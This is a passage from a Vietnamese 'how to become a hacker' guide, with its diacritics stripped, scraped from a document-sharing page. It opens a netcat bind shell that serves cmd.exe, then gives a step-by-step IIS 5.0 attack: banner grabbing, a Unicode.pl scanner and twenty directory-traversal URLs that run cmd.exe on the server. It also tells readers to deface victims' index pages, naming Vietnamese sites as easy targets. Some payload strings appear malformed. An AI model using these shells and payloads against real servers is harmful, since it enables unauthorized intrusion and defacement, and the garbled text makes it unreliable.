E: > nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 - > lng nghe ngay trn cng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163?
?

Trn Windows NT, t Netcat ch lng nghe, khng cn phi c quyn
Administrator, ch cn login vo vi 1 username bnh thng khi ng Netcat l xong.
Ch : bn khng th chy netcat vi ... -u -e cmd.exe... hoc ...-u -e /bin/sh... v netcat s
khng lm vic ng. Nu bn mun c mt UDP shell trn Unix, hy dng udpshell
thay cho netcat.

( Da theo bi vit ca huynh Vicky )

49 . ) K thut hack IIS server 5.0 :

_ IIS server vi cc phin bn t trc n phin bn 5.0 u c li ta c th khai thc
, do by gi hu ht mi ngi u dng IIS server 5.0 nn li cc phin bn trc ti
khng cp n . By gi ti s by cc bn cch hack thng qua cng c activeperl v
IE , cc bn c th vn dng cho cc trang Web VN v chng b li ny rt nhiu . Ta
hy bt u nh .
_ Trc ht cc bn hy download activeperl v Unicode.pl .
_ S dng telnet xc nh trang Web ta tn cng c s dng IIS server 5.0 hay khng :

CODE
telnet < tn trang Web > 80
GET HEAD / HTTP/1.0

Nu n khng bo cho ta bit mc tiu ang s dng chng trnh g th cc bn hy thay
i cng 80 bng cc cng khc nh 8080, 81, 8000, 8001 .v.v
_ Sau khi xc nh c mc tiu cc bn vo DOS g :

CODE
perl unicode.pl
Host: ( g a ch server m cc bn mun hack )
Port: 80 ( hoc 8080, 81, 8000, 8001 tu theo cng m ta telnet trc ) .

_ Cc bn s thy bng lit k li ( c lp trnh trong Unicode.pl ) nh sau :

CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13]/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.e
xe?/c+
[15]/cgi-
bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
?/c+
[17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.e
xe?/c+
[18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
?/c+
[19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe
?/c+
[20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.e
xe?/c+

Cc bn s thy c tt c cc li trn nu trang Web nn nhn b tt c nhng li nh
vy , nu server ca nn nhn ch b li th 13 v 17 th bng kt qu ch xut hin dng
th 13 v 17 m thi .
Ti ly VD l bng kt qu cho ti bit trang Web nn nhn b li th 3 v 7 , ti s ra IE
v nhp on m tng ng trn Address :

http://www.xxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+ < == li dng th
3
hoc
http://www.xxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ < == li dng th
7

n y cc bn c th xm nhp vo server ca nn nhn ri , cc bn hy s
dng lnh trong DOS m khai thc thng tin trong ny . Thng thng cc trang Web
nm th mc vinetpubwwwroot , cc bn vo c rI th ch cn thay index.html vI
tn hack by . L c ri , ng quy h nh .

GOOKLUCK!!!!!!!!!!!!!!!

Tro Thanh Hacker JFKLRPWGBD 20130117032341 64820

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Tro Thanh Hacker JFKLRPWGBD 20130117032341 64820

Uploaded by

Copyright:

Available Formats

Trn trng cm n ngi cung cp cho UDS cun sch ny.

Nhng hiu bit c bn nht tr thnh Hacker - Phn

You might also like